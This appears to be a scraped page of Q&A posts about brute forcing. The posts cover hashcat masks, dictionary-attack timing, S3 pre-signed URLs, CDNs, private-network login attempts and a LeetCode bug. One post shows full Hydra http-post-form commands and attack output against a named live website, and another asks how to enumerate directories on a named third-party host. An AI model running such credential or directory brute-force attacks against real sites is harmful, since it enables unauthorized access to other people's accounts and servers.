brute force – Bruteforcing URL to find directory

So imagine I have this URL: https://media.st.dl.pinyuncloud.com/apps/xyz/images/abc/ – it exists and returns error 403, which means it exists but I cannot access it due to no privilege.

I want to brute-force and find all the directories like ‘abc’ which exist but which we cannot access, for example by using a wordlist.

Can you recommend me the most efficient way to do this?

python – Two sum brute force – works on Jupyter but not on LeetCode

num = [3,6,11,15]
target = 9

def twosum(numlist, target):
    for i in range(len(numlist)-1):
        for j in range(i+1, len(numlist)):
            if numlist[i]+numlist[j]==target:
                print(numlist[i],numlist[j])
    return None

print(twosum(num,target))

I got a runtime error, although I did not have any problem running it on Jupyter… I need some enlightenment!

NameError: name 'Solution' is not defined
    ret = Solution().twoSum(param_1, param_2)
Line 35 in _driver (Solution.py)
    _driver()
Line 46 in <module> (Solution.py)

brute force – Specifying wordsets in variables within hashcat masks/rules?

Hashcat documentation shows the following variables that we can use inside masks:

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff

We can even create custom charsets (abc1234XYZ…). However, I wonder whether there is a way to do a similar thing with wordsets (word1,word2,…)

?set1 = word1,word2,word3,... 

brute force – Hacking attempts from unknown source

These requests are coming from your private network, not from the public internet.

172.20.76.173 is part of the 172.16.0.0/12 subnet, which is dedicated for private networks. See https://en.wikipedia.org/wiki/Private_network for more info.

Is it possible that the security policy that you created is only applied to the public interface, and not the private interface?
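The check described in this answer, as an added example that is not part of the original post: it tallies failed logins by source address and reports which RFC 1918 block, if any, each source falls in. The log format, the sample lines and the function names are assumptions constructed for illustration; only 172.20.76.173 and 172.16.0.0/12 come from the answer.

```python
import ipaddress
import re
from collections import Counter

# RFC 1918 private ranges. 172.16.0.0/12 spans 172.16.0.0 - 172.31.255.255 only,
# so 172.32.x.x is NOT private even though it "looks" similar.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample log (hypothetical format, not taken from the post).
SAMPLE_LOG = """\
2021-02-01 09:00:01 login failed user=admin src=172.20.76.173
2021-02-01 09:00:02 login failed user=admin src=172.20.76.173
2021-02-01 09:00:03 login failed user=root src=172.32.0.9
2021-02-01 09:00:04 login failed user=root src=203.0.113.7
2021-02-01 09:00:05 login ok user=alice src=192.168.1.20
2021-02-01 09:00:06 login failed user=bob src=not-an-ip
"""

FAILED_RE = re.compile(r"login failed .*?src=(\S+)")

def classify(addr):
    """Return the RFC 1918 block containing addr, 'not-rfc1918', or 'invalid'."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return "invalid"
    for net in RFC1918:
        if ip in net:  # False for IPv6 addresses against these IPv4 networks
            return str(net)
    return "not-rfc1918"

def failed_login_origins(log_text):
    """Count failed logins per (source, classification) pair."""
    tally = Counter()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            tally[(m.group(1), classify(m.group(1)))] += 1
    return tally

def internal_sources(tally):
    """Sources of failed logins that sit inside a private range."""
    private = {str(n) for n in RFC1918}
    return sorted({src for (src, cls) in tally if cls in private})

if __name__ == "__main__":
    for (src, cls), n in failed_login_origins(SAMPLE_LOG).most_common():
        print(f"{n:3d}  {src:15s}  {cls}")
```

Any address returned by `internal_sources` reaches the service over an internal path, which is where to check that the security policy is actually bound.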

brute force – Dictionary Attack Calculation

If I have a dictionary of passwords and have gained knowledge of usernames of a target site, how long will it take me to check all the passwords against the usernames if I have a computer that can test 1 billion combinations a second?

What formula should I use? Say I have 1 million dictionary passwords and know 500 000 usernames.

brute force – If and how security-oriented CDNs protect from BFAs?

I understand how some CDNs also provide protection from DDoS attacks by distributing content serving across various machines instead of just one machine, so that distributed attacks on one machine become infeasible.

If I am not mistaken, such CDNs can also help protect against brute force attacks, and if so it might be good for me because I am currently having some trouble setting up rate limiting due to some shared hosting and content management system mismatches.

If and how security-oriented CDNs protect from BFAs?

untagged – Is the Amazon S3 Pre-Signed URL protected from brute force attack?

I want to know whether an Amazon S3 Pre-Signed URL is protected from brute force attacks.

For example, if I am the only person who knows the Pre-Signed URL, is it extremely unlikely that somebody could use a brute force attack and gain access to the bucket?

brute force – Help with Hydra Bruteforce

I’m a beginner using Hydra brute force and entered here before to get some help that was successful.
In this case I’m attacking the website: https://hubbe.es

I don’t know why but my command is perfect and doesn’t work…
This is the view-source from the login page:

    <input type="text" class="input" placeholder="Usuario" name="username">
</div>
    <div class="input_box pass">
    <input type="password" class="input" placeholder="Contraseña" name="password">
    <input type="submit" value="Entrar" class="login-btn" name="login"> 

And this is the command that I’m using to attack the page: (Used the network tab from chrome to make it + the view-source of the page)

hydra -l Lucki -P PASSS.txt -vV -s 80 -f hubbe.es http-post-form "/index.php:username=^USER^&password=^PASS^&login=Entrar:F=¡Tu contraseña no es correcta!" 

Basically when I use the command this is the result:

Hydra (http://www.thc.org/thc-hydra) starting at 2021-01-03 14:05:53
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 5 tasks per 1 server, overall 64 tasks, 5 login tries (l:1/p:5), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target hubbe.es - login "Lucki" - pass "mamaguebaso" - 1 of 5 (child 0)
[ATTEMPT] target hubbe.es - login "Lucki" - pass "singamalo" - 2 of 5 (child 1)
[ATTEMPT] target hubbe.es - login "Lucki" - pass "culoculo9" - 3 of 5 (child 2)
[ATTEMPT] target hubbe.es - login "Lucki" - pass "lolmen32" - 4 of 5 (child 3)
[ATTEMPT] target hubbe.es - login "Lucki" - pass "sdfdfsad" - 5 of 5 (child 4)
[VERBOSE] Page redirected to http://hubbe.es/index.ph
[VERBOSE] Page redirected to http://hubbe.es/index.ph
[VERBOSE] Page redirected to http://hubbe.es/index.ph
[VERBOSE] Page redirected to http://hubbe.es/index.ph
[VERBOSE] Page redirected to http://hubbe.es/index.ph
[VERBOSE] Page redirected to http://hubbe.es/index.p
[VERBOSE] Page redirected to http://hubbe.es/index.p
[VERBOSE] Page redirected to http://hubbe.es/index.p
[VERBOSE] Page redirected to http://hubbe.es/index.p
[VERBOSE] Page redirected to http://hubbe.es/index.p
[VERBOSE] Page redirected to http://hubbe.es/index.
[VERBOSE] Page redirected to http://hubbe.es/index.
[VERBOSE] Page redirected to http://hubbe.es/index.
[VERBOSE] Page redirected to http://hubbe.es/index.
[VERBOSE] Page redirected to http://hubbe.es/index.
[VERBOSE] Page redirected to http://hubbe.es/index
hubbe.es/index redirected to http://
[VERBOSE] Page redirected to http://hubbe.es/index
[VERBOSE] Page redirected to http://hubbe.es/index
hubbe.es/index redirected to http://
[VERBOSE] Page redirected to http://hubbe.es/inde
[VERBOSE] Page redirected to http://hubbe.es/inde
[VERBOSE] Page redirected to http://hubbe.es/inde
[VERBOSE] Page redirected to http://hubbe.es/inde
[VERBOSE] Page redirected to http://hubbe.es/inde
[VERBOSE] Page redirected to http://hubbe.es/ind
[VERBOSE] Page redirected to http://hubbe.es/ind
[VERBOSE] Page redirected to http://hubbe.es/ind
[VERBOSE] Page redirected to http://hubbe.es/ind
[VERBOSE] Page redirected to http://hubbe.es/ind
[VERBOSE] Page redirected to http://hubbe.es/in
[VERBOSE] Page redirected to http://hubbe.es/in
[VERBOSE] Page redirected to http://hubbe.es/in
[VERBOSE] Page redirected to http://hubbe.es/in
[VERBOSE] Page redirected to http://hubbe.es/in
[VERBOSE] Page redirected to http://hubbe.es/i
hubbe.es/iPage redirected to http://
[VERBOSE] Page redirected to http://hubbe.es/i
hubbe.es/iPage redirected to http://
hubbe.es/iPage redirected to http://
[STATUS] attack finished for hubbe.es (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found 

The username that I’m attacking is mine and the password is in the little .txt file that I’m using. Evidently I’m just testing to find a command that works on this page. If somebody can help me with this it would be great.

I also tried with this command:

hydra -l Lucki -P PASSS.txt -vV -s 80 -f hubbe.es http-post-form "/index.php:username=^USER^&password=^PASS^&login=Entrar:S=me"

But the hydra just “found a correct password” when it isn’t…